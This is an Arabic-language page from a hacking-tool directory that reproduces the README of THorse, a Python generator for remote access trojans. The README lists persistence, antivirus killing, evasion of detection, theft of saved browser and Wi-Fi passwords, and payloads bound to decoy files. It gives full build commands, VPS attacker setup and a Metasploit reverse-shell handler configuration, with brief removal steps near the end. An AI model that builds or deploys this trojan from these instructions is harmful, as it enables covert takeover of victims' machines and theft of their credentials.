Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
thorse — THorse هو مولد RAT (حصان الإدارة عن بعد) لأنظمة ويندوز/لينكس مكتوب بلغة Python 3. | Kitploit
أدوات/GitHubGitHub/pushpenderindia/thorse
كسر كلمات المرورأطر الاستغلالتوليد الحمولةآليات الاستمراريةالتهرب من IDS/IPSما بعد الاستغلالالقيادة والسيطرةحصان طروادة للوصول عن بعدمكافحة الروبوتات
GitHubpushpenderindia/thorse

thorse

THorse هو مولد RAT (حصان الإدارة عن بعد) لأنظمة ويندوز/لينكس مكتوب بلغة Python 3.

614126منذ 2 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع

THorse

THorse هو مولد RAT (حصان طروادة للإدارة عن بُعد) لأنظمة ويندوز/لينكس مكتوب بلغة بايثون 3.

root@kitploit:~
                  هذا السكربت البايثون الصغير يمكنه فعل أعمال رائعة حقًا.

إخلاء المسؤولية

:computer: تم إنشاء هذا المشروع لأغراض جيدة فقط واستخدام شخصي.

يتم توفير هذا البرنامج "كما هو" دون أي ضمان من أي نوع. يمكنك استخدام هذا البرنامج على مسؤوليتك الخاصة. الاستخدام هو المسؤولية الكاملة للمستخدم النهائي. لا يتحمل المطورون أي مسؤولية ولا يكونون مسؤولين عن أي سوء استخدام أو ضرر ناتج عن هذا البرنامج.

الميزات

  • يعمل على ويندوز/لينكس
  • إعلام الضحية الجديدة عبر البريد الإلكتروني
  • غير قابل للاكتشاف
  • لا يتطلب صلاحيات الجذر أو المسؤول
  • الثبات (Persistence)
  • إرسال لقطة شاشة لشاشة جهاز الضحية عبر البريد الإلكتروني
  • منح وصول كامل لميتربريتر للمهاجم
  • لا يحتاج أبدًا إلى تثبيت Metasploit لإنشاء حصان طروادة
  • إنشاء ملف تنفيذي ثنائي بدون أي تبعيات (Zero Dependencies)
  • إنشاء حجم صغير ~ 5 ميغابايت مع وظائف متقدمة
  • تشويش (Obfusticate) الحمولة قبل تجميعها، وبالتالي تجاوز عدد قليل من مضادات الفيروسات
  • الحمولة المُنشأة مشفرة بـ Base64، مما يجعل الهندسة العكسية للحمولة صعبة للغاية
  • قتل مضاد الفيروسات على جهاز الضحية ومحاولة تعطيل مركز أمان ويندوز
  • واجهة رائعة ملونة لإنشاء الحمولة
  • على جانب المهاجم: أثناء إنشاء الحمولة، يقوم السكربت تلقائيًا باكتشاف التبعيات المفقودة وتثبيتها
مصادر استرجاع كلمات المرور المدعومة، يحاول استرجاع كلمات المرور المحفوظة من:
متصفح كروم
Wi-Fi

ملاحظة: أداة السرقة المخصصة مبرمجة، ولا تعتمد على LaZagne

تم اختباره على

Kali) Kali Linux - ROLLING EDITION

Windows) ويندوز 10

Windows) ويندوز 8.1 - برو

Windows) ويندوز 7 - الترا

فيما يلي قيود حمولة الميتربريتر المُنشأة باستخدام Metasploit:

  • يجب تشغيل مستمع Metasploit قبل تنفيذ الباب الخلفي
  • الباب الخلفي نفسه لا يصبح ثابتًا (persistent)، يجب استخدام وحدات ما بعد الاستغلال لجعل الباب الخلفي ثابتًا. ووحدات ما بعد الاستغلال لا يمكن استخدامها إلا بعد الاستغلال الناجح.
  • لا يخطرنا عند تنفيذ الحمولة على نظام جديد.

نعلم جميعًا مدى قوة حمولة الميتربريتر ولكن الحمولة المصنوعة منها لا تزال غير مرضية.

فيما يلي ميزات مولد الحمولة هذا والتي ستعطيك فكرة جيدة عن هذا السكربت البايثون:

  • يستخدم ريجستري ويندوز ليصبح ثابتًا في الويندوز.
  • يتمكن أيضًا من الثبات في نظام لينكس.
  • يمكن للحمولة العمل على لينكس وكذلك ويندوز.
  • يوفر وصولًا كاملاً، حيث يمكن استخدام مستمع Metasploit وكذلك يدعم مستمعًا مخصصًا (يمكنك إنشاء المستمع الخاص بك)
  • يرسل إشعارًا عبر البريد الإلكتروني، عند تشغيل الحمولة على نظام جديد، مع معلومات كاملة عن النظام.
  • يولد الحمولة خلال دقيقة واحدة أو أقل.
  • يدعم جميع وحدات ما بعد الاستغلال الخاصة بالميتربريتر.
  • يمكن إنشاء الحمولة على ويندوز وكذلك لينكس.

المتطلبات الأساسية

  • بايثون 3.X
  • عدد قليل من الوحدات الخارجية

يرجى ملاحظة:

في ويندوز، يرجى تحديد/تعيين مسار Pyinstaller في paygen.py [السطر 14]

المسار الافتراضي هو: PYTHON_PYINSTALLER_PATH = os.path.expanduser("C:/Python37-32/Scripts/pyinstaller.exe")

قم بتغييره وفقًا لنظامك

كيفية الاستخدام في لينكس

root@kitploit:~
# تثبيت التبعيات
$ قم بتثبيت أحدث إصدار من بايثون 3.x

# انتقل إلى دليل /opt (اختياري)
$ cd /opt/

# استنساخ هذا المستودع
$ git clone https://github.com/PushpenderIndia/thorse.git

# ادخل إلى المستودع
$ cd thorse

# تثبيت التبعيات
$ bash installer_linux.sh

# إذا كنت تواجه أي أخطاء أثناء تنفيذ installer_linux.sh، جرب التثبيت باستخدام installer_linux.py
$ python3 installer_linux.py

$ chmod +x paygen.py
$ python3 paygen.py --help

# صنع الحمولة/حصان الطروادة
$ python3 paygen.py --ip 127.0.0.1 --port 8080 -e [email protected] -p YourEmailPass -l -o output_file_name --icon icon_path

# صنع الحمولة/حصان الطروادة مع قاتل مضاد فيروسات مخصص [افتراضيًا، تمت إضافة العديد من مضادات الفيروسات المعروفة في قائمة Kill_Targets]
$ python3 paygen.py --ip 127.0.0.1 --port 8080 -e [email protected] -p YourEmailPass -l -o output_file_name --icon icon_path --kill_av AntiVirus.exe

# صنع الحمولة/حصان الطروادة مع وقت مخصص للثبات
$ python3 paygen.py --ip 127.0.0.1 --port 8080 -e [email protected] -p YourEmailPass -l -o output_file_name --icon icon_path --persistence 10 

ملاحظة: يمكنك أيضًا استخدام الأيقونات المخصصة لدينا من مجلد icon، فقط استخدمها هكذا  --icon icon/pdf.ico

كيفية الاستخدام في VPS (موصى به)

root@kitploit:~
# 1. قم بإعداد VPS، يمكنك شراء VPS أوبونتو من أي مزود VPS مثل Digital Ocean، Linode، AWS، إلخ

# 2. اتصل بـ VPS الخاص بك باستخدام SSH
$ ssh username@ip_address

# 3. قم بتحديث VPS لينكس الخاص بك
$ sudo apt update

# 4. أضف مستودع Kali Linux
$ sudo sh -c "echo 'deb https://http.kali.org/kali kali-rolling main non-free contrib' > /etc/apt/sources.list.d/kali.list"

# 5. قم بتثبيت حزمة gnupg
$ sudo apt install gnupg

# 6. أضف المفاتيح العامة لـ Kali
$ wget 'https://archive.kali.org/archive-key.asc' && sudo apt-key add archive-key.asc

# 7. تحديث VPS
$ sudo apt update

# 8. تعيين أولوية Kali
$ sudo sh -c "echo 'Package: *'>/etc/apt/preferences.d/kali.pref; echo 'Pin: release a=kali-rolling'>>/etc/apt/preferences.d/kali.pref; echo 'Pin-Priority: 50'>>/etc/apt/preferences.d/kali.pref"

# 9. تحديث VPS
$ sudo apt update

# 10. تثبيت Metasploit Framework في VPS
$ sudo apt install -t kali-rolling metasploit-framework

# ملاحظة: الخطوات أعلاه تحتاج إلى تنفيذ مرة واحدة فقط

# 11. تثبيت pip3
$ sudo apt install python3-pip

# 12. استنساخ هذا المستودع
$ git clone https://github.com/PushpenderIndia/thorse.git

# 13. ادخل إلى المستودع
$ cd thorse

# 14. تثبيت التبعيات
$ bash installer_linux.sh

# 15. إذا كنت تواجه أي أخطاء أثناء تنفيذ installer_linux.sh، جرب التثبيت باستخدام installer_linux.py
$ python3 installer_linux.py

$ 16. chmod +x paygen.py
$ python3 paygen.py --help

# صنع الحمولة/حصان الطروادة (إذا كنت تريد تجميع RAT لويندوز، قم ببناء RAT على جهاز ويندوز واستخدم VPS للتحكم في RAT عن بُعد)
$ python3 paygen.py --ip VPS_Public_IP_Address --port 8080 -e [email protected] -p YourEmailPass -l -o output_file_name --icon icon_path

# صنع الحمولة/حصان الطروادة مع قاتل مضاد فيروسات مخصص [افتراضيًا، العديد من مضادات الفيروسات المعروفة مضافة في Kill_Targets]
$ python3 paygen.py --ip VPS_Public_IP_Address --port 8080 -e [email protected] -p YourEmailPass -l -o output_file_name --icon icon_path --kill_av AntiVirus.exe

# صنع الحمولة/حصان الطروادة مع وقت مخصص للثبات
$ python3 paygen.py --ip VPS_Public_IP_Address --port 8080 -e [email protected] -p YourEmailPass -l -o output_file_name --icon icon_path --persistence 10 

ملاحظة: يمكنك أيضًا استخدام الأيقونات المخصصة لدينا من مجلد icon، فقط استخدمها هكذا  --icon icon/pdf.ico

كيفية الاستخدام في ويندوز

root@kitploit:~
# تثبيت التبعيات
$ قم بتثبيت أحدث إصدار من بايثون 3.x

# استنساخ هذا المستودع
$ git clone https://github.com/PushpenderIndia/thorse.git

# ادخل إلى المستودع
$ cd thorse

# تثبيت التبعيات
$ python -m pip install -r requirements.txt

# افتح paygen.py في محرر نصوص وقم بتكوين السطر 15، اضبط مسار Pyinstaller، المسار الافتراضي كما يلي:-
# PYTHON_PYINSTALLER_PATH = os.path.expanduser("C:/Python37-32/Scripts/pyinstaller.exe")

# الحصول على قائمة المساعدة
$ python paygen.py --help

# صنع الحمولة/حصان الطروادة
$ python paygen.py --ip 127.0.0.1 --port 8080 -e [email protected] -p YourEmailPass -w -o output_file_name --icon icon_path

# صنع الحمولة/حصان الطروادة مع قاتل مضاد فيروسات مخصص [افتراضيًا، العديد من مضادات الفيروسات المعروفة مضافة في Kill_Targets]
$ python paygen.py --ip 127.0.0.1 --port 8080 -e [email protected] -p YourEmailPass -l -o output_file_name --icon icon_path --kill_av AntiVirus.exe

# صنع الحمولة/حصان الطروادة مرتبطًا بملف شرعي [أي ملف .exe، .pdf، .txt إلخ]
$ python paygen.py --ip 127.0.0.1 --port 8080 -e [email protected] -p YourEmailPass -l -o output_file_name --icon icon/txt.ico --bind passwords.txt 

ملاحظة: يمكنك أيضًا استخدام الأيقونات المخصصة لدينا من مجلد icon، فقط استخدمها هكذا  --icon icon/pdf.ico

ملاحظة:- سيتم حفظ الملف الخبيث داخل مجلد dist/، داخل مجلد technowhorse/

إنشاء اتصال باستخدام Msfconsole

  • تحتاج إلى تثبيت Metasploit-Framework على نظامك لإنشاء الاتصال

  • الإعدادات الموصى بها، يمكنك محاولة اختبارها مع أي حمولة أخرى في السطر 2

root@kitploit:~
$ sudo msfconsole
msf3> use exploit/multi/handler
msf3> set payload python/meterpreter/reverse_tcp
msf3> set LHOST 192.168.43.221
msf3> set LPORT 443
msf3> run

كيفية التحديث

  • قم بتشغيل updater.py للتحديث تلقائيًا أو قم بتنزيل أحدث ملف Zip من مستودع GitHub هذا
  • ملاحظة: يجب تثبيت Git لاستخدام updater.py

الوسائط المتاحة

  • وسائط اختيارية

ملاحظة: يجب تحديد إما -w/--windows أو -l/--linux

  • الوسائط الإلزامية

لقطات شاشة جديدة:

الحصول على المساعدة

إنشاء الحمولة

راجع أيضًا هذه الصور القديمة

~لقطات شاشة قديمة:

الحصول على المساعدة

تشغيل سكربت paygen.py

عند تشغيل RAT، يضيف إدخال ريجستري للثبات

يقوم بعمل نسخة من نفسه وحفظها داخل مجلد Roaming

التقرير المرسل من RAT

الحصول على إشعار من جهاز الضحية

المساهمون:

حاليًا يتم صيانة هذا المستودع من قبلي (Pushpender Singh). ولكن إذا كنت تريد أن تصبح مساهمًا، فقم بإضافة ميزة رائعة وقم بعمل طلب سحب (Pull Request)، سأقوم بمراجعته ودمجه في هذا المستودع.

سيتم قبول جميع طلبات السحب من المساهمين إذا كان طلب السحب الخاص بهم يستحق هذا المستودع.

المهام المتبقية (TODO)

  • إضافة ميزات جديدة
  • المساهمة في واجهة رسومية (GUI)

إزالة TechNowHorse في ويندوز:

الطريقة 1:

  • اذهب إلى start، اكتب regedit وقم بتشغيل البرنامج الأول، سيفتح محرر التسجيل.
  • انتقل إلى المسار التالي Computer\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run يجب أن يكون هناك إدخال باسم winexplorer، انقر بزر الماوس الأيمن على هذا الإدخال واختر Delete.
  • اذهب إلى مسار المستخدم > AppData > Roaming، سترى ملفًا باسم "explorer.exe"، هذا هو RAT، انقر بزر الماوس الأيمن > Delete.
  • أعد تشغيل النظام.

الطريقة 2:

  • قم بتشغيل "RemoveTHorse.bat" في النظام المصاب ثم أعد تشغيل الكمبيوتر لإيقاف تشغيل الملف الخبيث الحالي.

إزالة TechNowHorse في لينكس:

  • افتح ملف Autostart باستخدام أي محرر نصوص، مسار ملف Autostart: ~/.config/autostart/xinput.desktop

  • قم بإزالة هذه الأسطر الـ 5:

    root@kitploit:~
       [Desktop Entry]
       Type=Application
       X-GNOME-Autostart-enabled=true
       Name=Xinput
       Exec="destination_file_name"
    
  • ملاحظة: destination_file_name هو اسم الملف الخبيث الذي أعطيته لـ TrojanHorse الخاص بك باستخدام معامل -o

  • أعد تشغيل نظامك ثم احذف الملف الخبيث المخزن في هذا المسار أدناه

  • المسار الوجهة حيث يتم تخزين TrojanHorse: ~/.config/xnput

المساهمون

  • قائمة المساهمين المخصصين: Contributors

Pushpender Singh

:computer:

مساهمات من أي نوع مرحب بها!

ملاحظة: إذا كان يجب أن تكون في قائمة المساهمين لكننا نسينا ذكرك، فأخبرنا بذلك!

قائمة المهام المتبقية (TODO)

  • اقتراح ميزتك الخاصة : )
  • تطوير واجهة رسومية (GUI)
  • إصلاح الأخطاء
  • إضافة المزيد من مسرقات كلمات مرور المتصفحات
تنزيل الأداة
  • القدرة على إضافة أيقونة مخصصة للملف الخبيث
  • أداة ربط مدمجة يمكنها ربط ملف تنفيذي بـ أي ملف [.pdf, .txt, .exe إلخ]، تشغيل الملف الشرعي في الواجهة الأمامية والكود الخبيث في الخلفية كخدمة.
  • التحقق من وجود مثيل قيد التشغيل بالفعل على النظام، إذا تم العثور على مثيل قيد التشغيل، فسيتم تنفيذ الملف الشرعي فقط [مانع التشغيل المتعدد].
  • يمكن للمهاجم إنشاء/تجميع لكل من ويندوز/لينكس باستخدام نظام لينكس، ولكن يمكن فقط إنشاء/تجميع ملف ويندوز تنفيذي باستخدام جهاز ويندوز
  • استرجاع كلمات المرور المحفوظة من نظام الضحية وإرسالها إلى المهاجم.
  • الاختصارالاسم الكاملالوصف
    -h--helpعرض رسالة المساعدة هذه والخروج
    -k KILL_AV--kill_av KILL_AVقاتل مضاد الفيروسات: حدد ملف .exe الخاص بمضاد الفيروسات الذي يجب قتله. مثال: --kill_av cmd.exe
    -t TIME_IN_SECONDS--persistence TIME_PERSISTENTيصبح ثابتًا بعد __ ثانية. الافتراضي = 10
    -w--windowsإنشاء ملف ويندوز تنفيذي.
    -l--linuxإنشاء ملف لينكس تنفيذي.
    -b file.txt--bind LEGITIMATE_FILE_PATH.pdfأداة الربط التلقائي: حدد مسار الملف الشرعي. [نظام التشغيل المدعوم: ويندوز]
    -s--steal-passwordسرقة كلمات المرور المحفوظة من جهاز الضحية [نظام التشغيل المدعوم: ويندوز]
    -d--debugتشغيل الفيروس في المقدمة (Foreground)
    الاختصارالاسم الكاملالوصف
    --icon ICONحدد مسار الأيقونة، أيقونة الملف الخبيث [ملاحظة: يجب أن يكون .ico]
    --ip IP_ADDRESSعنوان البريد الإلكتروني لإرسال التقارير إليه.
    --port PORTمنفذ عنوان IP المعطى في وسيط --ip.
    -e EMAIL--email EMAILعنوان البريد الإلكتروني لإرسال التقارير إليه.
    -p PASSWORD--password PASSWORDكلمة مرور عنوان البريد الإلكتروني المعطى في وسيط -e.
    -o OUT--out OUTاسم ملف الإخراج.